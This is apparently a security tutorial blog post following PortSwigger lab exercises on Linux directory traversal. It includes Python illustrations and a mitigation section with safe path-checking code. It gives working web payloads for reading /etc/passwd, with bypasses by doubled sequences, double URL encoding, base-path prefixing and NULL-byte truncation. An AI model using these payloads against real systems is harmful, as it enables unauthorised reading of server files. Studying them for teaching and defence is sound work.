Exploiting directory traversal (Linux)

Understanding directory traversal:

Directory traversal, also known as file path traversal, allows an attacker to read arbitrary files on a system. These may include sensitive data such as credentials, usernames and web application code. On a Linux server, a file can only be read if the user running the application has permission to read it. Typically, a web application runs as the www-data user. Thus, while sensitive files like /etc/shadow cannot be read, other files such as /etc/passwd can, as this file is usually world-readable. In any case, each file read gives the attacker further information with which to extend their attack on the application.

Note: This blog post follows the directory traversal labs at the PortSwigger Web Security Academy.

The fundamental concept

Let us consider an application which displays images of different products to the user. If we right-click on any image and look at the URL we see something interesting. Take this simple example:

https://vulnerablewebsite.com/image?filename=television.jpg

Here, we see the server using the filename parameter to look up a file within the current directory and return its contents to the user. In this case, it is the real filename of a real image on the server. What would happen if we tried to access a file which is not an image, such as the /etc/passwd file?

In order to exploit this, it is not necessary to know in which directory these files reside, because we can traverse directories using this crafty sequence: ../ This tells the server to move up one directory. For example: if television.jpg is located in /var/www/images/, then a single ../ places us in /var/www/. Repeating the sequence eventually takes us to the root directory. The great thing is that the number of directories we traverse does not need to be exact: going up from the root directory simply leaves us at the root, so we can place as many ../ as we like, as long as there are enough to reach it. Once there, files such as /etc/passwd can be read, provided they are readable by the user the application runs as.
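The way ../ collapses can be sketched with Python's posixpath.normpath, which resolves a path purely as a string. This is only an illustration: the base directory is the one from the example above, the resolve helper is a name made up for this sketch, and a real server may build its path differently.

```python
import posixpath

BASE_DIR = "/var/www/images"  # directory from the example above


def resolve(filename: str) -> str:
    """Join the user-supplied name onto BASE_DIR and collapse any ../ segments."""
    return posixpath.normpath(posixpath.join(BASE_DIR, filename))


print(resolve("television.jpg"))                # /var/www/images/television.jpg
print(resolve("../television.jpg"))             # /var/www/television.jpg
print(resolve("../../../etc/passwd"))           # /etc/passwd
print(resolve("../../../../../../etc/passwd"))  # /etc/passwd (extra ../ are harmless)
```

The last two calls give the same result, which is why the number of ../ sequences only has to be large enough, not exact.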

Sometimes, traversing using ../ is not needed. An arbitrary file can be accessed simply by its absolute path, that is, its full location starting from the root / directory. For example:

https://vulnerablewebsite.com/image?filename=/etc/passwd
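One plausible reason an absolute path can work is the way some path-joining functions behave. As a sketch, assuming the application builds its path with something like Python's posixpath.join (an assumption, not something the example site is known to do), an absolute second argument replaces the base directory entirely:

```python
import posixpath

BASE_DIR = "/var/www/images"  # assumed base directory, for illustration only

# A relative filename is appended to the base directory as expected.
relative = posixpath.join(BASE_DIR, "television.jpg")

# An absolute filename discards everything that came before it.
absolute = posixpath.join(BASE_DIR, "/etc/passwd")

print(relative)  # /var/www/images/television.jpg
print(absolute)  # /etc/passwd
```

Whether a given application behaves this way depends on how it constructs the final path, so this is one thing to test rather than something to rely on.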

Note: This is a very simple example of directory traversal and modern applications, generally, will not be so generous to allow us to exploit them so trivially. As we go further into this post, we shall see ways to circumvent certain mitigations via multiple techniques, such as URL encoding.

Circumventing certain mitigations

Stripped traversal sequences:

Sometimes, traversal sequences may be stripped, not allowing the attacker to traverse back to the root directory. For example:

https://vulnerablewebsite.com/image?filename=../../../etc/passwd

If we send this to the server, an error is returned, because every ../ is stripped before the filename is processed. As a result, the request the application actually handles would look like this:

https://vulnerablewebsite.com/image?filename=etc/passwd

This file does not exist within the current directory, hence the error. Now, a way to circumvent this is to 'double up' on these traversal sequences. Let's take a look.

https://vulnerablewebsite.com/image?filename=....//....//....//etc//passwd

The web server strips the inner ../ from each ....// in a single pass, without checking the result again, and the characters left behind join up into the valid ../ sequences we saw earlier. This takes us back to the root directory, and provides the attacker with access to /etc/passwd. Pretty nice. It is worth noting that on Linux systems, repeated slashes are treated as a single slash, so ..// is equivalent to ../ and etc//passwd to etc/passwd. Therefore, if slashes are being stripped, adding an extra one may be another way to test the application.
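The effect of a single-pass filter can be reproduced in a few lines. This is a minimal sketch: strip_once is a hypothetical stand-in for the server's filter, and the base directory is assumed to be /var/www/images as in the earlier example.

```python
import posixpath


def strip_once(filename: str) -> str:
    """Hypothetical filter: remove every ../ in one pass, without re-checking the result."""
    return filename.replace("../", "")


payload = "....//....//....//etc//passwd"
filtered = strip_once(payload)

# Resolve the filtered name against the assumed base directory.
resolved = posixpath.normpath(posixpath.join("/var/www/images", filtered))

print(strip_once("../../../etc/passwd"))  # etc/passwd (the plain payload is neutralised)
print(filtered)                           # ../../../etc//passwd
print(resolved)                           # /etc/passwd
```

A filter that repeats the replacement until nothing changes would not be fooled by this particular payload, which is why the trick only works against non-recursive stripping.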

URL Encoding

Sometimes these earlier techniques will not be successful, as the application fully strips those traversal sequences. URL encoding replaces a character with "%" followed by the two hexadecimal digits of its byte value. Thus, URL encoding turns ../ into %2e%2e%2f, and encoding the result a second time (double encoding) gives %252e%252e%252f, because each "%" itself becomes %25. For example:

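https://vulnerablewebsite.com/image?filename=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd

This URL is double encoded. The filter sees only the once-decoded form %2e%2e%2f, which contains no literal ../ for it to strip. If the application then decodes the value a second time, it processes the filename as ../../../etc/passwd, allowing an attacker to read this file.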
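The two decoding steps can be followed with urllib.parse.unquote from the Python standard library. This is a sketch only: contains_traversal is a hypothetical filter, and the assumption is that the filter runs between the first and the second decode.

```python
from urllib.parse import unquote


def contains_traversal(value: str) -> bool:
    """Hypothetical filter that only looks for a literal ../ sequence."""
    return "../" in value


# Double-encoded form of ../../../etc/passwd
payload = "%252e%252e%252f" * 3 + "etc/passwd"

first = unquote(payload)   # the first decode, e.g. done by the web server
second = unquote(first)    # a second decode, done later by the application

print(first)                       # %2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
print(contains_traversal(first))   # False (the filter sees nothing to strip)
print(second)                      # ../../../etc/passwd
```

The payload only works when something downstream of the filter decodes the value again, so a failed attempt may simply mean there is no second decode.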

Validation of the start path

An application may require that a filename starts with an expected base folder. For example: if the base folder is /var/www/images, then a traversal like ?filename=/../../../etc/passwd will not work, as the base directory is not present at the start of the path. Let's take an example:

https://vulnerablewebsite.com/image?filename=/var/www/images/television.jpg

Here, we see exactly which directory television.jpg is located in. Removing the base directory will return an error. As a result, the attacker must start the path with the base directory and traverse from there, like so:

https://vulnerablewebsite.com/image?filename=/var/www/images/../../../etc/passwd

The start path is valid here, so the check passes and the traversal succeeds.
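Why a prefix check alone is not enough can be shown with a short sketch. The passes_prefix_check function is a hypothetical version of the validation described above; the point is that it inspects the raw string, while the file system acts on the resolved path.

```python
import posixpath

BASE_DIR = "/var/www/images"


def passes_prefix_check(filename: str) -> bool:
    """Hypothetical validation: accept anything that starts with the base folder."""
    return filename.startswith(BASE_DIR)


payload = "/var/www/images/../../../etc/passwd"

print(passes_prefix_check("/../../../etc/passwd"))  # False (rejected, no base folder)
print(passes_prefix_check(payload))                 # True (accepted by the check)
print(posixpath.normpath(payload))                  # /etc/passwd (what is actually read)
```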

File extension bypass

Sometimes, applications will hard-code an extension when reading a file. The resulting request will effectively look like so:

https://vulnerablewebsite.com/image?filename=/etc/passwd.jpg

This uses an absolute path to showcase what occurs. In order to bypass this, a NULL byte %00 is used to essentially cut off the .jpg portion of the request. If the application does not handle NULL bytes properly, it will allow an attacker to request any arbitrary file on the system, provided it is readable. For example:

https://vulnerablewebsite.com/image?filename=../../../etc/passwd%00.jpg

Here, the path is terminated before the extension, and so the file can be read.
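The mismatch behind this bypass can be simulated as follows. Both helper functions are hypothetical: passes_extension_check stands in for the application's validation, and c_style_truncate imitates a lower-level C string API that stops reading at the first NULL byte. Python's own open() rejects paths containing a NULL byte with a ValueError, so this models older or lower-level stacks rather than Python itself.

```python
from urllib.parse import unquote


def passes_extension_check(filename: str) -> bool:
    """Hypothetical validation: the filename must end with the expected extension."""
    return filename.endswith(".jpg")


def c_style_truncate(path: str) -> str:
    """Imitate a C string API, which treats the first NULL byte as the end of the string."""
    return path.split("\x00", 1)[0]


# %00 decodes to a NULL byte sitting between the real path and the extension.
payload = unquote("../../../etc/passwd%00.jpg")

print(passes_extension_check(payload))  # True (the string still ends in .jpg)
print(c_style_truncate(payload))        # ../../../etc/passwd
```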

Mitigation

This post covered some directory traversal techniques and how to bypass certain filters applied by the server. How does one mitigate them?

Validate user input: All user input is evil, whether it is intended by the application or not. It sounds obvious, and it is, but proper validation is critical. Using whitelists, ensuring that only specific characters are allowed (e.g. alphanumeric), and ensuring that the fully resolved path still begins with the base directory will decrease the likelihood of being vulnerable.
Principle of least-privilege: Ensure the server does not have more privileges than is necessary for a specific function (in this case, to run a web application). Why would a web server need access to /etc/shadow? It doesn't. Understand what access the web server user has to the file system.
Chroot jail: This changes the root directory of a process to a specified one. As a result, the web server essentially runs in a sandbox, and can only see the files that were deliberately placed inside it. Therefore, if a vulnerability is discovered, its impact will be decreased.
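As a rough sketch of the input validation point, the check below resolves the requested path first and only then compares it against the base directory. The safe_resolve name and the /var/www/images default are assumptions made for illustration; this is one possible approach, not a complete defence on its own.

```python
import os

BASE_DIR = "/var/www/images"  # assumed base directory, for illustration only


def safe_resolve(filename: str, base_dir: str = BASE_DIR) -> str:
    """Return the resolved path, or raise ValueError if it leaves base_dir."""
    base = os.path.realpath(base_dir)
    # realpath collapses ../ segments and follows symlinks before the comparison.
    candidate = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes the base directory")
    return candidate


for name in ("television.jpg", "../../../etc/passwd", "/etc/passwd"):
    try:
        print(name, "->", safe_resolve(name))
    except ValueError as err:
        print(name, "-> rejected:", err)
```

Comparing with os.path.commonpath rather than a plain startswith avoids accepting a sibling directory such as /var/www/images-old. A character whitelist on the filename can be applied before this check as an additional layer.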